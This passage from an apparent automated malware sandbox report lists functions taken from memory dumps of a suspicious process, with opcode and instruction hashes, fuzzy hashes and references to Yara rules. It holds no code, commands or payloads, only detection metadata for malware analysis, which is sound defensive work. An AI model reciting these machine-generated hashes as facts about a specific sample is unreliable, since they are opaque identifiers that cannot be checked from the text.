              • Opcode ID: f16f0957a1a68b97ac9f8840ca01ce3e5e0faae6749232c89db846c6cd4207d8
              • Instruction ID: 98f4ee49c6c260bdff931b4ee5c33659611c6e5884747f9b476dc72838945561
              • Opcode Fuzzy Hash: f16f0957a1a68b97ac9f8840ca01ce3e5e0faae6749232c89db846c6cd4207d8
              • Instruction Fuzzy Hash: B0F08170A0960ACFEB94AF68C4A92FA7BE0FF06315F00057AE918C2052EB786561D780
              Function 00007FFD3478AE7B Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c4228f2951c4bfef794dd30176e51cfe08e1b36420e2ddcb502f2ad5b295bd0d
              • Instruction ID: f376f54cbdbdc97d1e2a0ac6ce6084969330dc78f0f90d7f2d74274fa9382d87
              • Opcode Fuzzy Hash: c4228f2951c4bfef794dd30176e51cfe08e1b36420e2ddcb502f2ad5b295bd0d
              • Instruction Fuzzy Hash: 2BF04F75A5C60EDEEBA1EB7884DB5F977E0EF5A302F004CB2D509C2052EE38B5549680
              Function 00007FFD34782769 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 697cb60b6056dc3df57478241a2db6ca387a1ac62895b5e12955ea49b4e37c0b
              • Instruction ID: 57c215a0162217be8fe0e7b436892c0070f249ed0c879db263d6ae128ff50547
              • Opcode Fuzzy Hash: 697cb60b6056dc3df57478241a2db6ca387a1ac62895b5e12955ea49b4e37c0b
              • Instruction Fuzzy Hash: D1F0CD3090D3898FEB999F24C8A92A93BA0BF06212F0408BAD60AC61D2DA3CA414C751
              Function 00007FFD34791240 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4a43379ff0395c3eead795ebd1b949c8333c3533cac563980214e872548fdf33
              • Instruction ID: d0354b6d7a837377227bc313ff9370ff83c57b4dd731cc187dffd393ae4403c3
              • Opcode Fuzzy Hash: 4a43379ff0395c3eead795ebd1b949c8333c3533cac563980214e872548fdf33
              • Instruction Fuzzy Hash: 36F05E70A1890E8EEB88EF6898582FE76A0FF15301F40053AE81DC2191DF386560C680
              Function 00007FFD347827DD Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef917771e4ec820da13517e07193545b57c7d5175943a9a38f36670aa59d41ea
              • Instruction ID: dd821ee0d5416af84d7d212ad5a71b290000f4c7094886571ff0838988941c05
              • Opcode Fuzzy Hash: ef917771e4ec820da13517e07193545b57c7d5175943a9a38f36670aa59d41ea
              • Instruction Fuzzy Hash: ABF0F671A0D68D8FEB999F20C8662B93BA0BF46302F0004BAD509C60D2DB3DA414C340
              Function 00007FFD34782377 Relevance: .0, Instructions: 24COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction ID: 7f25f78d0693a9af2649372217d8ac58e4c8f07fe7652b9fa8828616592c17b0
              • Opcode Fuzzy Hash: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction Fuzzy Hash: 08F0FE70A0865ACFDB54EB10C8A5BA973A1FB51312F0042A9C14AD72D2DF7869859B41
              Function 00007FFD3478BCCA Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 87c057727c2d9d554268a418103faf9a71fccb8011b99ceff09abed8dc3d1650
              • Instruction ID: 9d305c72a1ea5257801172aeecbdecec4aed01bb0404f7c3dadaf51071f9897c
              • Opcode Fuzzy Hash: 87c057727c2d9d554268a418103faf9a71fccb8011b99ceff09abed8dc3d1650
              • Instruction Fuzzy Hash: E9D0127094C40BC9DBA0D614C495EFDB2649B15301F2095B1911DD2086DD3879C46B80

              Non-executed Functions

              Function 00007FFD3478F6AD Relevance: 8.9, Strings: 7, Instructions: 102COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2262863156.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: $"$=$C$Y$[$]
              • API String ID: 0-3933176780
              • Opcode ID: 8fbcbdb5e738ad5c909ba9bcf5f59c111f8c688160aba50262e2c24df3cc0ea5
              • Instruction ID: d52b4e1546cf70e8aba6e6d9ca3b83422e01ee0738bcb2a13cb16d330b413621
              • Opcode Fuzzy Hash: 8fbcbdb5e738ad5c909ba9bcf5f59c111f8c688160aba50262e2c24df3cc0ea5
              • Instruction Fuzzy Hash: C541B6B0E1562ACFEBA4DF14C8957E9B6B1EF15302F0005EAD10DD6291CB786A84DF81

              Executed Functions

              Function 00007FFD3478CAA9 Relevance: .5, Instructions: 463COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9a0076f080f8539589a7c6e2d766ac3afd8f51f21c4de5fa4b9a85b239e2d063
              • Instruction ID: 666d2617f5c3858ae869a97ec5850bb40ae70d7702be2f225e12ba01f077d752
              • Opcode Fuzzy Hash: 9a0076f080f8539589a7c6e2d766ac3afd8f51f21c4de5fa4b9a85b239e2d063
              • Instruction Fuzzy Hash: B7D1D667B0DA968FE351777CA8B60F97FA0DF5323670801B7C288CA093D91D744A92E1
              Function 00007FFD34783565 Relevance: .3, Instructions: 303COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 877bb7dc76da464141851c8d18dd63c9e89bd7620da5651ebe2a89f96f0a2cdc
              • Instruction ID: 9d0663eb829456e17a7d7c6ede566d7e00977df2f00d3aae41db5e2154a046f6
              • Opcode Fuzzy Hash: 877bb7dc76da464141851c8d18dd63c9e89bd7620da5651ebe2a89f96f0a2cdc
              • Instruction Fuzzy Hash: 5EA17F71B1894E8EEB94DB6CC8667AD7BE1FF5A311F4001BAD00DE32D6CBA968118741
              Function 00007FFD3478DD31 Relevance: 2.8, Strings: 2, Instructions: 253COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: Nf4$p\f4
              • API String ID: 0-128564398
              • Opcode ID: 49c3ee9b18be91927add0b1d932d009289ff65dd5ced4b81f9a0735084b375d9
              • Instruction ID: 0309e3e831b362af89ed1d2af1c804b005befbcab1790ddc2d426746b951a89e
              • Opcode Fuzzy Hash: 49c3ee9b18be91927add0b1d932d009289ff65dd5ced4b81f9a0735084b375d9
              • Instruction Fuzzy Hash: 0E91A7B2A18A8ACEE7A8AB6484B53F8B6E1FF55305F0441FED10DD21D3CE386844DB41
              Function 00007FFD34780CF8 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: H
              • API String ID: 0-2852464175
              • Opcode ID: 784b0c319d6e281fe53e39df04fc455cb344642c92308c5b12665a8354b6e80f
              • Instruction ID: 7fbcf0cb95cdd5c34888c7c276af3ccc13a6a3158a4dd7cbb6f50e84ecfee7e6
              • Opcode Fuzzy Hash: 784b0c319d6e281fe53e39df04fc455cb344642c92308c5b12665a8354b6e80f
              • Instruction Fuzzy Hash: 20911971F08A498FE794EB64C8A6BEDB3A1FF56311F0142B9D10DE7192DE3879458B80
              Function 00007FFD3478C562 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: R_H
              • API String ID: 0-1692749215
              • Opcode ID: c91075980c5cb25ee14198f4df5a55802585ce6a718508627591cf297bd94514
              • Instruction ID: 33820e95f55c3ff38fb0a17d3d1206e7b925f0b68aa440bd83a20ecbad3ca25f
              • Opcode Fuzzy Hash: c91075980c5cb25ee14198f4df5a55802585ce6a718508627591cf297bd94514
              • Instruction Fuzzy Hash: 6D31BCB5E1891D8FEBD4EB58D8A66ACB7F1FF99301F501139D10DE7242DE2868419B40
              Function 00007FFD347915B2 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34790000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: 57b3f70adcd0879fe988939776a1faaa164790d60e7b9e98ae60d57a933ae231
              • Instruction ID: 0124f89fd6464dcaa9f0e103d8fa221baebc3f2375f07ffee4863633da58c4ba
              • Opcode Fuzzy Hash: 57b3f70adcd0879fe988939776a1faaa164790d60e7b9e98ae60d57a933ae231
              • Instruction Fuzzy Hash: 7531F775E08629CEEBA4DF54D8A47E9B7B1FB59311F1002AAD40DE3291CF386994DF80
              Function 00007FFD34780A01 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: 8vg4
              • API String ID: 0-1336873573
              • Opcode ID: 9002ce85a52689e8c53ab7cf8f28b5c5d44c8abcf9d8193dd85a7596862ce51a
              • Instruction ID: e23e07ac6e3e6d5230fa59b5fe508c28d4b7d8537ba29a009cec2b3e0a1ebc91
              • Opcode Fuzzy Hash: 9002ce85a52689e8c53ab7cf8f28b5c5d44c8abcf9d8193dd85a7596862ce51a
              • Instruction Fuzzy Hash: C011C171A1864E8FE790EF68C49A2BE77E0FF5A301F424476C408D21A2EF38B4408780
              Function 00007FFD3478124D Relevance: 1.3, Strings: 1, Instructions: 56COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: pyg4
              • API String ID: 0-441656714
              • Opcode ID: c614ee201d2c1202ba46ad534652c999fbdae5e0e95521f8f04559cbeec4cdff
              • Instruction ID: 0be1f31a75449bf23e66437157611bd84d25b78d86e98762fd8ded43c908c56c
              • Opcode Fuzzy Hash: c614ee201d2c1202ba46ad534652c999fbdae5e0e95521f8f04559cbeec4cdff
              • Instruction Fuzzy Hash: 0411C170B0964A8FEB98DB64C5AA2BA7BE0FF5A302F00007EC00AD60D2DF38B540D740
              Function 00007FFD34781260 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: pyg4
              • API String ID: 0-441656714
              • Opcode ID: 3767dd80904621dc5787fe2b340d02a78abb514c9dea6b4b4ea1ec24f16c2198
              • Instruction ID: b8953f911a240d6018c5030de5584e874471caaefced58fe0967c7367f9c6856
              • Opcode Fuzzy Hash: 3767dd80904621dc5787fe2b340d02a78abb514c9dea6b4b4ea1ec24f16c2198
              • Instruction Fuzzy Hash: C3F0A4B1F0964E8AEBD49BA885A92FA77E4FF56316F04043AD51ED10C2DE287504D680
              Function 00007FFD347903E4 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34790000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID: P
              • API String ID: 0-3110715001
              • Opcode ID: aa5f2709edc1ff099110456efe0fc1d0cf198aed2c6df415270028bfc51d32f0
              • Instruction ID: ba15ef8b33428f7d3ac189005593a50ccd85c29cec0bb62dc688a9c0b4913bae
              • Opcode Fuzzy Hash: aa5f2709edc1ff099110456efe0fc1d0cf198aed2c6df415270028bfc51d32f0
              • Instruction Fuzzy Hash: A6F04CB0D1962D8EEBA5DF1488957E8B6F5AF19301F0011E9D54DE2281CB386B95DF80
              Function 00007FFD347816C8 Relevance: .3, Instructions: 284COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ad37552f396f3499e27ce5a661fbff4d664184614c9820efb6a988b8da5ca14
              • Instruction ID: d7c07f83fe389ff0e1ad8e47b1a15dc036b6bc9715ef8d6be720164a052bbe26
              • Opcode Fuzzy Hash: 3ad37552f396f3499e27ce5a661fbff4d664184614c9820efb6a988b8da5ca14
              • Instruction Fuzzy Hash: 6991B371B0CA498FDB99DE1C88A66B977E2FF99315B14057AE54DD3282CE34BC028781
              Function 00007FFD34783155 Relevance: .2, Instructions: 184COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7cff5e28e377db721473407efd96d80f11ef50fa6d882e98767218a735e30baa
              • Instruction ID: 098a187f1a972100c63c681602398b63cf202a8fd617312d7f044654fb257e44
              • Opcode Fuzzy Hash: 7cff5e28e377db721473407efd96d80f11ef50fa6d882e98767218a735e30baa
              • Instruction Fuzzy Hash: D4613CB0E1851ACFEB94DBA8C5A66FC7BF1EF46302F50007AD10DE7292DA396841DB40
              Function 00007FFD34781CFD Relevance: .2, Instructions: 170COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 697ff2f03a4d482243da14de95112bea8d2a18ac54997168a641f0af3e3a99f7
              • Instruction ID: 74604706740df051a11716356fad5b1719da50eb2dfa8acd3c391a6bc8eeddef
              • Opcode Fuzzy Hash: 697ff2f03a4d482243da14de95112bea8d2a18ac54997168a641f0af3e3a99f7
              • Instruction Fuzzy Hash: 5F51D670B1868A8FDB9CDE1888A56BA77E2FF95301F14457ED54EC7292CE39B801C781
              Function 00007FFD3478CB4D Relevance: .2, Instructions: 164COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7888996c91b3919e3464c5efb81cb6bb6fdd2761c30bc5608930ce33e53716f6
              • Instruction ID: ef2807fdf9a7014962585459ef7b1cdafb2a6060a77664e1b7d9319cd187d144
              • Opcode Fuzzy Hash: 7888996c91b3919e3464c5efb81cb6bb6fdd2761c30bc5608930ce33e53716f6
              • Instruction Fuzzy Hash: 7E419073B0892B8BE650BBACB0660FD7794EF5233AB144277D24CDA083DA29309596D4
              Function 00007FFD3478CB78 Relevance: .1, Instructions: 145COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be82388885911aa6e74ec1eae0954cf1d13729dfdd215b6951b6626f54ebc31c
              • Instruction ID: ab792a2def6636a20959be949ebc490fd6e25816b020356f320b947ea1a5a0eb
              • Opcode Fuzzy Hash: be82388885911aa6e74ec1eae0954cf1d13729dfdd215b6951b6626f54ebc31c
              • Instruction Fuzzy Hash: BF418173B0891B8BE754BAACB4660FD7794EF5233AB144277D20CCA083DE2D709596D4
              Function 00007FFD3478CB80 Relevance: .1, Instructions: 141COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3f4b245c5164c6c4af469744a95e8c1f647ac95cd9bf87e7f30b3ae510dde137
              • Instruction ID: a9e4cfbd12e15f7becac4f7e8c3c995d0a2005acd22e6c7f18cdec0a1e606adc
              • Opcode Fuzzy Hash: 3f4b245c5164c6c4af469744a95e8c1f647ac95cd9bf87e7f30b3ae510dde137
              • Instruction Fuzzy Hash: 034191B3B0891B8BE754BAA8B0660FD7794EF5233AB144277D20CCA083DE2D709596D4
              Function 00007FFD34782115 Relevance: .1, Instructions: 137COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d9f3d6497a3f10e961e6203c3740aa6b08f9dc2327ff33483289509251867a42
              • Instruction ID: 861412db683c62c21e38728ec684d47f30348809659dd1c9338691da0fde2447
              • Opcode Fuzzy Hash: d9f3d6497a3f10e961e6203c3740aa6b08f9dc2327ff33483289509251867a42
              • Instruction Fuzzy Hash: 36412371F0DA4A8FE395DB78C4A61B977E1EF87302F4544BAD509C72A2DE2CB8418391
              Function 00007FFD3478CC12 Relevance: .1, Instructions: 133COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3a5edf97b8e02b33196f019cde5e3624988c69f6ae388fe19810b15a232d5c1b
              • Instruction ID: cfb4aeb5de24f2f71ccdb009834d13d144a56498247f26252bffb519daa05269
              • Opcode Fuzzy Hash: 3a5edf97b8e02b33196f019cde5e3624988c69f6ae388fe19810b15a232d5c1b
              • Instruction Fuzzy Hash: 5D41B4B7B085179BE794B6ACB4A60FD7794EF5233AB040277D20CC6093DE2C304952D4
              Function 00007FFD34792E28 Relevance: .1, Instructions: 128COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34790000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0acd9be5e08c2e6c71746e6d6ad41da2b54e1c1b31f153884b31ef6e13c078bb
              • Instruction ID: f038e91de9834ebedcb6a5518d23d040ae7e069b579eb4f28e14b9e52864f825
              • Opcode Fuzzy Hash: 0acd9be5e08c2e6c71746e6d6ad41da2b54e1c1b31f153884b31ef6e13c078bb
              • Instruction Fuzzy Hash: A24109B0E1861D8EEB94EF68D8A5BACB6B1FF59301F5045B9C00DE3291DF386985DB40
              Function 00007FFD34792E43 Relevance: .1, Instructions: 127COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34790000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2e225c249e96171c52143a7d495f17d8e77349a37d422d50c153db57bd41ac5e
              • Instruction ID: 39833c1e9f666146109730ff5510c8b127391a80e7e9869d7e9cf0c3857abc91
              • Opcode Fuzzy Hash: 2e225c249e96171c52143a7d495f17d8e77349a37d422d50c153db57bd41ac5e
              • Instruction Fuzzy Hash: A741E9B0E1861D8EEB94EB68D895BACB7B2FF59301F5041A9D00DE3291DF386981DF40
              Function 00007FFD34792BAD Relevance: .1, Instructions: 122COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34790000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 67a155d29f916563fecf26163bd3c33321f40dba1e11580ae8f288f395a5ebd3
              • Instruction ID: e6b8cdb0e0fc7f19922152db0e4000e2b9a15e99edcd9d2f3e58f3b7d9de7ed5
              • Opcode Fuzzy Hash: 67a155d29f916563fecf26163bd3c33321f40dba1e11580ae8f288f395a5ebd3
              • Instruction Fuzzy Hash: D8413270E18A1E9FDB94EB94D8A56EDB7B1FF59301F100579E409E7292CF386841CB81
              Function 00007FFD34781DA3 Relevance: .1, Instructions: 118COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d5fcda0d3a38d911305633b58a710be059b645bb898863b9d1f2edb7267578a
              • Instruction ID: 0613d9f627f15dca618130d53eb5baa9ca586320a9e56a4b6120c2e8bd2727f8
              • Opcode Fuzzy Hash: 1d5fcda0d3a38d911305633b58a710be059b645bb898863b9d1f2edb7267578a
              • Instruction Fuzzy Hash: 5D316270718A4A8FDB8CDE1CC8A557A73E2FBD8356B14453ED54AD3285CE34E8128B81
              Function 00007FFD3478CBD3 Relevance: .1, Instructions: 118COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7a1f926fc5688d83f9da3c578609540cf6484c10735fa1d68556ea2e5f9f64f3
              • Instruction ID: 339293a70a3ca27efd524a1d488ac2794527b84f66082c94ec9afc5bbead1d59
              • Opcode Fuzzy Hash: 7a1f926fc5688d83f9da3c578609540cf6484c10735fa1d68556ea2e5f9f64f3
              • Instruction Fuzzy Hash: 9E31B3B7B0891B8BE755B6ACB4A60FD7790EF5333AB044277D208C6093DE2C305592E4
              Function 00007FFD34792419 Relevance: .1, Instructions: 112COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34790000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b93317311313656d9353ee4ac43f318faa1c6f52fccd662cbc58ffd9b951e89a
              • Instruction ID: a6afdc40cab1c8a70fb79d47e82e33d6f1601f53a2d7aee80654f5873da36b80
              • Opcode Fuzzy Hash: b93317311313656d9353ee4ac43f318faa1c6f52fccd662cbc58ffd9b951e89a
              • Instruction Fuzzy Hash: BC41D0B0E0961D8FDB94EF58C4A5BA8B7B2FF59301F5045A9D00DD3292CE39A981DF40
              Function 00007FFD3478C5DA Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_7ffd34780000_xMLVfJVxhYAkoCJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b10c3c2e5cc585c5ec998b23a33f4572084634f27724c494b4e8549d962aff4e
              • Instruction ID: 42d5a1ef34880d0aeb0ab7c07789e2ff98372430db93c1b8c17f7f9dfea366c3
              • Opcode Fuzzy Hash: b10c3c2e5cc585c5ec998b23a33f4572084634f27724c494b4e8549d962aff4e
              • Instruction Fuzzy Hash: 4021EFB1F1891D8FEB94EB5898AA6ACB7F1FF9A301F501139D10DD7242DE2868419B40
              Function 00007FFD347822F9 Relevance: .1, Instructions: 86COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000023.00000002.2331140577.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
